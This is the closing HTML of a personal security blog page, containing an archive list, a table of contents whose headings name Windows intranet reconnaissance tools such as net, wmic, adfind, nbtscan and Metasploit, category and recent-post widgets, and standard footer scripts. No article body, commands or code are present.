href="/archives/2021/05/"><span class="level-start"><span class="level-item">May 2021</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/03/"><span class="level-start"><span class="level-item">March 2021</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/02/"><span class="level-start"><span class="level-item">February 2021</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/01/"><span class="level-start"><span class="level-item">January 2021</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/11/"><span class="level-start"><span class="level-item">November 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/09/"><span class="level-start"><span class="level-item">September 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/08/"><span class="level-start"><span class="level-item">August 2020</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/07/"><span class="level-start"><span class="level-item">July 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/05/"><span class="level-start"><span class="level-item">May 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/01/"><span class="level-start"><span class="level-item">January 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/12/"><span class="level-start"><span class="level-item">December 2019</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/11/"><span class="level-start"><span class="level-item">November 2019</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></div></div></div><!--!--><div class="column-right-shadow is-hidden-widescreen is-sticky"></div></div><div class="column column-right is-4-tablet is-4-desktop is-3-widescreen is-hidden-touch is-hidden-desktop-only order-3 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list"><li><a class="level is-mobile" href="#内网信息收集"><span class="level-left"><span class="level-item">1</span><span class="level-item">内网信息收集</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#辅助命令"><span class="level-left"><span class="level-item">1.1</span><span class="level-item">辅助命令</span></span></a></li><li><a class="level is-mobile" href="#宗旨"><span class="level-left"><span class="level-item">1.2</span><span class="level-item">宗旨</span></span></a></li><li><a class="level is-mobile" href="#杂余命令"><span class="level-left"><span class="level-item">1.3</span><span class="level-item">杂余命令</span></span></a></li><li><a class="level is-mobile" href="#net-命令"><span class="level-left"><span class="level-item">1.4</span><span class="level-item">net 命令</span></span></a></li><li><a class="level is-mobile" href="#netsh-防火墙相关"><span class="level-left"><span class="level-item">1.5</span><span class="level-item">netsh-防火墙相关</span></span></a></li><li><a class="level is-mobile" href="#wmic"><span class="level-left"><span class="level-item">1.6</span><span class="level-item">wmic</span></span></a></li><li><a class="level is-mobile" href="#ds-命令"><span class="level-left"><span class="level-item">1.7</span><span class="level-item">ds 命令</span></span></a></li><li><a class="level is-mobile" href="#tasklist"><span class="level-left"><span class="level-item">1.8</span><span class="level-item">tasklist</span></span></a></li><li><a class="level is-mobile" href="#adfind-exe"><span class="level-left"><span class="level-item">1.9</span><span class="level-item">adfind.exe</span></span></a></li><li><a class="level is-mobile" href="#nbtscan-exe"><span class="level-left"><span class="level-item">1.10</span><span class="level-item">nbtscan.exe</span></span></a></li><li><a class="level is-mobile" href="#Metasploit"><span class="level-left"><span class="level-item">1.11</span><span class="level-item">[[Metasploit]]</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#使用-TCP-模块进行端口扫描"><span class="level-left"><span class="level-item">1.11.1</span><span class="level-item">使用 TCP 模块进行端口扫描</span></span></a></li></ul></li><li><a class="level is-mobile" href="#powershell-框架"><span class="level-left"><span class="level-item">1.12</span><span class="level-item">[[powershell]]框架</span></span></a></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">Categories</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/HackStyle/"><span class="level-start"><span class="level-item">HackStyle</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile" href="/categories/Penetration/"><span class="level-start"><span class="level-item">Penetration</span></span><span class="level-end"><span class="level-item tag">14</span></span></a></li><li><a class="level is-mobile" href="/categories/TechLearning/"><span class="level-start"><span class="level-item">TechLearning</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile" href="/categories/Toolkit/"><span class="level-start"><span class="level-item">Toolkit</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li></ul></div></div></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">Recents</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-03-30T23:02:00.000Z">2023-03-31</time></p><p class="title"><a href="/2023/03/31/AIGC%E7%BB%98%E7%94%BB/">元素法师的修习日志-SD/NovelAI Prompt写法总览</a></p><p class="categories"><a href="/categories/HackStyle/">HackStyle</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-01-09T16:00:00.000Z">2023-01-10</time></p><p class="title"><a href="/2023/01/10/Git/">GIT:A boon for open-source developers who need to collaborate on code.</a></p><p class="categories"><a href="/categories/TechLearning/">TechLearning</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-12-30T16:00:00.000Z">2022-12-31</time></p><p class="title"><a href="/2022/12/31/fzf/">fzf(Fuzzy File Finder) enhances the efficiency and convenience of your command-line workflow.</a></p><p class="categories"><a href="/categories/Toolkit/">Toolkit</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-12-08T16:00:00.000Z">2022-12-09</time></p><p class="title"><a href="/2022/12/09/%E6%A0%91%E8%8E%93%E6%B4%BE%E6%90%AD%E5%BB%BA%E5%AE%B6%E5%BA%AD%E5%BD%B1%E9%99%A2/">使用 Raspberry Pi 搭建 Kodi 家庭影院</a></p><p class="categories"><a href="/categories/HackStyle/">HackStyle</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-12-06T16:00:00.000Z">2022-12-07</time></p><p class="title"><a href="/2022/12/07/%E6%A0%91%E8%8E%93%E6%B4%BE%E8%87%AA%E5%BB%BA%E5%9B%BE%E5%BA%8A/">使用 Raspberry Pi 自建 MinIO 图床</a></p><p class="categories"><a href="/categories/HackStyle/">HackStyle</a></p></div></article></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.jpg" alt="Resek&#039;s Kingdom" height="28"></a><p class="is-size-7"><span>&copy; 2023 Resek4</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/Resek4"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "This website uses cookies to improve your experience.",
          dismiss: "Got it!",
          allow: "Allow cookies",
          deny: "Decline",
          link: "Learn more",
          policy: "Cookie Policy",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script></body></html>